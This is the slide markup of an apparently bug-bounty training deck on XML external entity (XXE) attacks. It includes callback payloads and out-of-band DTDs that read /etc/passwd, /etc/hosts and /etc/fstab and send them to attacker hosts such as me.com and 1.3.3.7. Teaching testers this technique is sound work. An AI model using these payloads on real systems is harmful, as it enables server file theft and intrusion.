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Lato"/>
      <p:regular r:id="rId50"/>
      <p:bold r:id="rId51"/>
      <p:italic r:id="rId52"/>
      <p:boldItalic r:id="rId53"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Source Code Pro"/>
      <p:regular r:id="rId54"/>
      <p:bold r:id="rId55"/>
      <p:italic r:id="rId56"/>
      <p:boldItalic r:id="rId57"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arial Black"/>
      <p:regular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55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54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57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56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59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Oswald-regular.fntdata"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/ArialBlac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53efb3c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53efb3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53efb3cea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53efb3cea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b53efb3cea_1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b53efb3cea_1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b53efb3cea_1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b53efb3cea_1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53efb3cea_1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53efb3cea_1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53efb3cea_1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53efb3cea_1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53efb3cea_1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53efb3cea_1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53efb3cea_1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53efb3cea_1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53efb3cea_1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53efb3cea_1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b53efb3cea_1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b53efb3cea_1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b53fe231a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b53fe231a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53efb3cea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53efb3cea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b53fe231a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b53fe231a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b53fe231a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b53fe231a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53fe231a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53fe231a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b53fe231a5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b53fe231a5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536bd4a9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536bd4a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b536bd4a9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b536bd4a9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b53fe231a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b53fe231a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53fe231a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53fe231a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b61bf269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b61bf269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b61bf269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b61bf269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53efb3cea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53efb3cea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adf99fab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adf99fab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53efb3cea_1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53efb3cea_1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b53efb3cea_1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b53efb3cea_1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b53efb3cea_1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b53efb3cea_1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b53efb3cea_1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b53efb3cea_1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b53efb3cea_1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b53efb3cea_1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b53efb3cea_1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b53efb3cea_1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b53fe231a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b53fe231a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b53fe231a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b53fe231a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53fe231a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b53fe231a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53efb3cea_1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53efb3cea_1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53efb3cea_1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53efb3cea_1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b53efb3cea_1_8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b53efb3cea_1_8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b53efb3cea_1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b53efb3cea_1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b53efb3ce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b53efb3ce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53efb3cea_1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53efb3cea_1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df99fab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df99fab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536bd4a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536bd4a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53fe231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53fe23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53efb3cea_1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53efb3cea_1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hyperlink" Target="https://twitter.com/0xAwali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hyperlink" Target="https://twitter.com/0xcela/status/1350508661530095619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hyperlink" Target="https://www.youtube.com/watch?v=gluSEBZpplQ&amp;ab_channel=ekopartysecurityconference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hyperlink" Target="https://hackerone.com/reports/347139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hackerone.com/reports/500515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hyperlink" Target="https://www.youtube.com/watch?v=9ZokuRHo-eY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hyperlink" Target="https://hackerone.com/reports/154096" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/312543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hyperlink" Target="https://2016.appsec.eu/wp-content/uploads/2016/07/AppSecEU2016-Christopher-Spaeth-From-DTD-to-XXE.pdf" TargetMode="External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hyperlink" Target="https://blog.zsec.uk/out-of-band-xxe-2/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@valeriyshevchenko/my-first-xml-external-entity-xxe-attack-with-gpx-file-5ca78da9ae98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hyperlink" Target="https://2016.appsec.eu/wp-content/uploads/2016/07/AppSecEU2016-Christopher-Spaeth-From-DTD-to-XXE.pdf" TargetMode="External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hyperlink" Target="https://www.dropbox.com/sh/vkn2qsxz8i8o6oi/AADM2E52Ejnq5h6h580KCYLda?dl=0&amp;preview=Exercise_2_external_dtd.pdf" TargetMode="External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hyperlink" Target="https://www.youtube.com/watch?v=gluSEBZpplQ&amp;ab_channel=ekopartysecurityconference" TargetMode="External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hyperlink" Target="https://blog.zsec.uk/blind-xxe-learning/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/bugbountywriteup/soap-based-unauthenticated-out-of-band-xml-external-entity-oob-xxe-in-a-help-desk-software-c27a6abf182a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hyperlink" Target="https://osama-alaa.medium.com/xxe-injection-in-oracle-application-server-11g-cc05f6ab55ab" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://github.com/GoSecure/dtd-finder/blob/master/list/dtd_files.txt" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dropbox.com/sh/vkn2qsxz8i8o6oi/AADM2E52Ejnq5h6h580KCYLda?dl=0&amp;preview=Exercise_5_local_dtd.pdf" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/" TargetMode="External"/><Relationship Id="rId8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hyperlink" Target="https://2016.appsec.eu/wp-content/uploads/2016/07/AppSecEU2016-Christopher-Spaeth-From-DTD-to-XXE.pdf" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=gluSEBZpplQ&amp;ab_channel=ekopartysecurityconferenc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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://honoki.net/2018/12/12/from-blind-xxe-to-root-level-file-read-access/" TargetMode="External"/><Relationship Id="rId5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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dropbox.com/sh/vkn2qsxz8i8o6oi/AADM2E52Ejnq5h6h580KCYLda?dl=0&amp;preview=Exercise_3_php_encoding.pdf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mahmoudsec.blogspot.com/2019/08/exploiting-out-of-band-xxe-using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www.youtube.com/watch?v=9ZokuRHo-eY" TargetMode="External"/><Relationship Id="rId7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hyperlink" Target="https://www.youtube.com/watch?v=9ZokuRHo-eY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2016.appsec.eu/wp-content/uploads/2016/07/AppSecEU2016-Christopher-Spaeth-From-DTD-to-XXE.pdf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Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/intigriti/status/1177178910397796353" TargetMode="External"/><Relationship Id="rId7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s://hackerone.com/reports/248668" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/315837" TargetMode="External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2016.appsec.eu/wp-content/uploads/2016/07/AppSecEU2016-Christopher-Spaeth-From-DTD-to-XXE.pdf" TargetMode="External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www.slideshare.net/ssuserf09cba/xxe-how-to-become-a-jedi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hyperlink" Target="https://2016.appsec.eu/wp-content/uploads/2016/07/AppSecEU2016-Christopher-Spaeth-From-DTD-to-XXE.pdf" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/3645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www.dropbox.com/sh/vkn2qsxz8i8o6oi/AADM2E52Ejnq5h6h580KCYLda?dl=0&amp;preview=HIP2019-Advanced_XXE_Exploitation.pdf" TargetMode="External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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4678175" y="2159275"/>
            <a:ext cx="3916500" cy="12555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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>POST /xml-body HTTP/1.1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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content-Type: application/xml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Content-Length: Number</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3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&lt;root&gt;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      &lt;email&gt;me@gmail.com&gt;&lt;/email&gt;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      &lt;password&gt;*********&lt;/password&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/root&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="Google Shape;203;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3868050" y="339175"/>
            <a:ext cx="53502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55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XML</a:t>
            </a:r>
            <a:b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55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B O D Y</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="55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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4028100" y="2926150"/>
            <a:ext cx="50301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3000">
                <a:solidFill>
                  <a:srgbClr val="4242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 sz="3000">
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000"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 sz="3000"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6"/>
              </a:rPr>
              <a:t>@0xAwali</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="300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Get </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS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 Reverse Interaction </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>By Using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&lt;!DOCTYPE name [ &lt;!ENTITY  SYSTEM "http://id.burpcollaborator.net"&gt;]&gt;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21" name="Google Shape;321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SYSTEM "</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://id.burpcollaborator.net/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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3" name="Google Shape;323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Get </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS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 Reverse Interaction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standalone="no" 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&lt;?xml version="1.0" encoding="UTF-8" standalone="no"?&gt;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33" name="Google Shape;333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encoding="UTF-8" standalone="no"?&gt;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root [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SYSTEM "http://id.burpcollaborator.net/"&gt;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34" name="Google Shape;334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5" name="Google Shape;335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PUBLIC Instead Of SYSTEM </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS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 Reverse Interaction </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>By Using</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. &lt;!DOCTYPE name [ &lt;!ENTITY  PUBLIC "http://id.burpcollaborator.net"&gt;]&gt;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45" name="Google Shape;345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PUBLIC "http://id.burpcollaborator.net/"&gt;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46" name="Google Shape;346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7" name="Google Shape;347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9" name="Google Shape;34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1" name="Google Shape;35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Get </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS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 Reverse Interaction </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>By Using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&lt;!DOCTYPE name SYSTEM "http://id.burpcollaborator.net"&gt;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57" name="Google Shape;357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SYSTEM "http://id.burpcollaborator.net/"&gt;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&lt;email&gt;me@gmail.com&lt;/email&gt;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9" name="Google Shape;359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1" name="Google Shape;36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3" name="Google Shape;36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Get </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS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 Reverse Interaction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standalone="no" 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&lt;?xml version="1.0" encoding="UTF-8" standalone="no"?&gt;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69" name="Google Shape;369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encoding="UTF-8" standalone="no"?&gt;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SYSTEM "http://id.burpcollaborator.net/"&gt;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&lt;email&gt;me@gmail.com&lt;/email&gt;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70" name="Google Shape;370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1" name="Google Shape;371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3" name="Google Shape;37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5" name="Google Shape;37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PUBLIC Instead Of SYSTEM </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS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HTTP Reverse Interaction </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>By Using</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. &lt;!DOCTYPE name PUBLIC "http://id.burpcollaborator.net"&gt;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81" name="Google Shape;381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PUBLIC "http://id.burpcollaborator.net/"&gt;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&lt;email&gt;me@gmail.com&lt;/email&gt;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82" name="Google Shape;382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3" name="Google Shape;383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85" name="Google Shape;3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7" name="Google Shape;38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Get </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Read Files From FTP Server </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>By Using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&lt;!DOCTYPE name [ &lt;!ENTITY  SYSTEM "ftp://comapny.com/secrets.txt"&gt;]&gt;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93" name="Google Shape;393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SYSTEM "ftp://company.com/secrets.txt"&gt;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94" name="Google Shape;394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5" name="Google Shape;395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7" name="Google Shape;3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9" name="Google Shape;39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Get </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Read Files From FTP Server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standalone="no" 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&lt;?xml version="1.0" encoding="UTF-8" standalone="no"?&gt;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05" name="Google Shape;405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encoding="UTF-8" standalone="no"?&gt;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root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SYSTEM "ftp://company.com/secrets.txt"&gt;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06" name="Google Shape;406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7" name="Google Shape;407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9" name="Google Shape;4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1" name="Google Shape;41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PUBLIC Instead Of SYSTEM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0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Read Files From FTP Server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By Using</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. &lt;!DOCTYPE name [ &lt;!ENTITY  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PUBLIC</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "ftp://comapny.com/secrets.txt"&gt;]&gt;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17" name="Google Shape;417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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PUBLIC</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "ftp://company.com/secrets.txt"&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:b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18" name="Google Shape;418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9" name="Google Shape;419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1" name="Google Shape;42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9" name="Google Shape;429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XML File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31" name="Google Shape;43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8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root [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&lt;!ELEMENT root ANY &gt; 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&lt;!ENTITY % read SYSTEM "http://me.com/file.xml"&gt;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%read;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%responseBack;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433" name="Google Shape;433;p58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file.xml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data SYSTEM "file:///etc/passwd"&gt;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responseBack "&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pwnfromME</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SYSTEM 'http%data;://1.3.3.7/;'&gt;"&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="Google Shape;434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5" name="Google Shape;43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Workflow Of Hacking XML BODY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3" name="Google Shape;2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510" y="2159925"/>
            <a:ext cx="1583775" cy="11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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="560838" y="3427200"/>
            <a:ext cx="2993100" cy="270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Content-Type: application/json</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="00FF00"/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575" y="2159925"/>
            <a:ext cx="1628325" cy="11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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5364192" y="3427200"/>
            <a:ext cx="3299100" cy="270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Content-Type: application/xml</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="218" name="Google Shape;218;p41"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2920100" y="2730329"/>
            <a:ext cx="3077700" cy="156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2075" y="2578400"/>
            <a:ext cx="371925" cy="303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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2496875" y="2015625"/>
            <a:ext cx="3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B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Convert Content Type Header</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5364192" y="3834925"/>
            <a:ext cx="3299100" cy="270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Content-Type: */*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1" name="Google Shape;441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XML File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With standalone="no"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43" name="Google Shape;44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9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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> encoding="UTF-8" standalone="no"</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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root [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&lt;!ELEMENT root ANY &gt; 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&lt;!ENTITY % read SYSTEM "http://me.com/file.xml"&gt;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%read;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%responseBack;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445" name="Google Shape;445;p59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file.xml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data SYSTEM "file:///etc/passwd"&gt;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responseBack "&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pwnfromME</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SYSTEM 'http%data;://1.3.3.7/;'&gt;"&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Google Shape;446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7" name="Google Shape;44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3" name="Google Shape;453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XML File With </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PUBLIC Instead Of SYSTEM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55" name="Google Shape;45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0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encoding="UTF-8" standalone="no"?&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [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&lt;!ELEMENT </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ANY &gt; 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&lt;!ENTITY % read PUBLIC "http://me.com/file.xml"&gt;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%read;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%responseBack;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457" name="Google Shape;457;p60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file.xml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data SYSTEM "file:///etc/passwd"&gt;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responseBack "&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pwnfromME</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SYSTEM 'http%data;://1.3.3.7/;'&gt;"&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="458" name="Google Shape;458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9" name="Google Shape;45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5" name="Google Shape;465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DTD File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67" name="Google Shape;46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61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encoding="UTF-8"?&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [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send SYSTEM "https://me.com/file.dtd"&gt;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%send;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%all;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469" name="Google Shape;469;p61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file.dtd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read SYSTEM 'file:///etc/hosts"&gt;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all "&lt;!ENTITY pwnfromME SYSTEM 'file:///test/_%read;'&gt;"&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="470" name="Google Shape;470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1" name="Google Shape;47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3" name="Google Shape;473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5" name="Google Shape;475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023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1" name="Google Shape;481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DTD File II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83" name="Google Shape;48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2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encoding="UTF-8"?&gt;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root [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read SYSTEM "file:///etc/passwd"&gt;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send SYSTEM "http://me.com/file.dtd"&gt;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%send;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485" name="Google Shape;485;p62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file.dtd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all "&lt;!ENTITY pwnfromME SYSTEM 'http://me.com/?file=&amp;read;'&gt;"&gt;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%all;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="486" name="Google Shape;486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7" name="Google Shape;487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9" name="Google Shape;489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91" name="Google Shape;491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023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97" name="Google Shape;497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DTD File III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99" name="Google Shape;49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3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encoding="UTF-8"?&gt;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root SYSTEM "http://me.com/file.dtd"&gt;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501" name="Google Shape;501;p63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B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@mine:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat file.dtd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&lt;!ENTITY % file SYSTEM "file:///etc/passwd"&gt;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&lt;!ENTITY % send "&lt;!ENTITY pwnfromMe SYSTEM 'http://me.com/?%file;'&gt;"&gt;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</a:rPr>
              <a:t>%send;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="800">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="502" name="Google Shape;502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3" name="Google Shape;50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5" name="Google Shape;505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07" name="Google Shape;507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3" name="Google Shape;513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DTD File IIII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15" name="Google Shape;51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4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encoding="UTF-8"?&gt;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root SYSTEM "http://me.com/file.dtd"&gt;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517" name="Google Shape;517;p64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B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@mine:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat file.dtd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="8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&lt;!ENTITY start "&lt;![CDATA["&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="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&lt;!ENTITY file SYSTEM "file:///etc/fstab"&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="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&lt;!ENTITY end "]]&gt;"&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="80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&lt;!ENTITY pwnfromME "&amp;start;&amp;file;&amp;end;"&gt;]&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="800">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
